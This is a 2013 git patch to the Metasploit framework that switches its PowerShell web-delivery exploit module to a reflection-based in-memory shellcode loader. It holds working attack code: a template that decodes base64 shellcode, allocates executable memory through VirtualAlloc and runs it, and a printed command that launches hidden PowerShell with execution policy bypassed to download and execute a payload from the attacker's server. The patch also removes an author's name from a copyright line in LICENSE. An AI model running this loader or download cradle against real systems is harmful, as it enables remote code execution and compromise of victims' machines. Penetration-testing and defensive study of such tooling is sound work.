From 0a2917685585f5ad2738dfc68896cb968576d8ff Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 16 Dec 2013 09:08:01 +0000
Subject: [PATCH] Update psh_web_delivery for reflection

---
 LICENSE                                             |  6 +++++-
 .../scripts/to_mem_pshreflection.ps1.template       |  5 +----
 lib/msf/util/exe.rb                                 | 13 ++++++++-----
 modules/exploits/windows/misc/psh_web_delivery.rb   |  4 ++--
 4 files changed, 16 insertions(+), 12 deletions(-)

diff --git a/LICENSE b/LICENSE
index acb2f21eca..768247fb50 100644
--- a/LICENSE
+++ b/LICENSE
@@ -15,8 +15,12 @@ License: BSD-3-clause
 # Last updated: 2013-Nov-04
 #
 
+Files: data/templates/to_mem_pshreflection.ps1.template
+Copyright: 2012, Matthew Graeber
+License: BSD-3-clause
+
 Files: data/john/*
-Copyright: 1996-2011 Solar Designer.
+Copyright: 1996-2011
 License: GPL-2
 
 Files: external/pcaprub/*
diff --git a/data/templates/scripts/to_mem_pshreflection.ps1.template b/data/templates/scripts/to_mem_pshreflection.ps1.template
index c56e66cabe..92ac5dca7f 100644
--- a/data/templates/scripts/to_mem_pshreflection.ps1.template
+++ b/data/templates/scripts/to_mem_pshreflection.ps1.template
@@ -1,6 +1,3 @@
-#Added a tweaked by shellster
-#Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
-
 function %{func_get_proc_address} {
 	Param ($%{var_module}, $%{var_procedure})		
 	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
@@ -21,7 +18,7 @@ function %{func_get_delegate_type} {
 	return $%{var_type_builder}.CreateType()
 }
 
-%{shellcode}
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
 		
 $%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, [math]::max(0x1000, $%{var_code}.Length), 0x40)
 $%{var_memset} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} msvcrt.dll memset), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32])))
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index e7fd88b376..f5855d2872 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -914,15 +914,17 @@ require 'msf/core/exe/segment_injector'
     hash_sub[:var_rwx] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_iter] 		= Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_syscode] 		= Rex::Text.rand_text_alpha(rand(8)+8)
-
     hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
 
     return read_replace_script_template("to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
-  
+
+  #
+  # Reflection technique prevents the temporary .cs file being created for the .NET compiler
+  # Tweaked by shellster
+  # Originally from PowerSploit
+  #
   def self.to_win32pe_psh_reflection(framework, code, opts={})
-    #Added a tweaked by shellster
-    #Originally taken from https://github.com/mattifestation/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
     hash_sub = {}
     hash_sub[:func_get_proc_address] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:func_get_delegate_type] = Rex::Text.rand_text_alpha(rand(8)+8)
@@ -935,7 +937,8 @@ require 'msf/core/exe/segment_injector'
     hash_sub[:var_type_builder] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_buffer] = Rex::Text.rand_text_alpha(rand(8)+8)
     hash_sub[:var_memset] = Rex::Text.rand_text_alpha(rand(8)+8)
-    hash_sub[:shellcode] = Rex::Text.to_powershell(code, hash_sub[:var_code])
+
+    hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
 
     return read_replace_script_template("to_mem_pshreflection.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
   end
diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index f85d380c6e..61a7f2bc66 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Delivering Payload")
-    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+    data = Msf::Util::EXE.to_win32pe_psh_reflection(framework, payload.encoded)
     send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
   end
 
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
     url = get_uri()
     download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
     print_status("Run the following command on the target machine:")
-    print_line("powershell.exe -w hidden -nop -ep bypass -c \"#{download_and_run}\"")
+    print_line("powershell.exe -w hidden -nop -ep bypass -noe -c \"#{download_and_run}\"")
   end
 end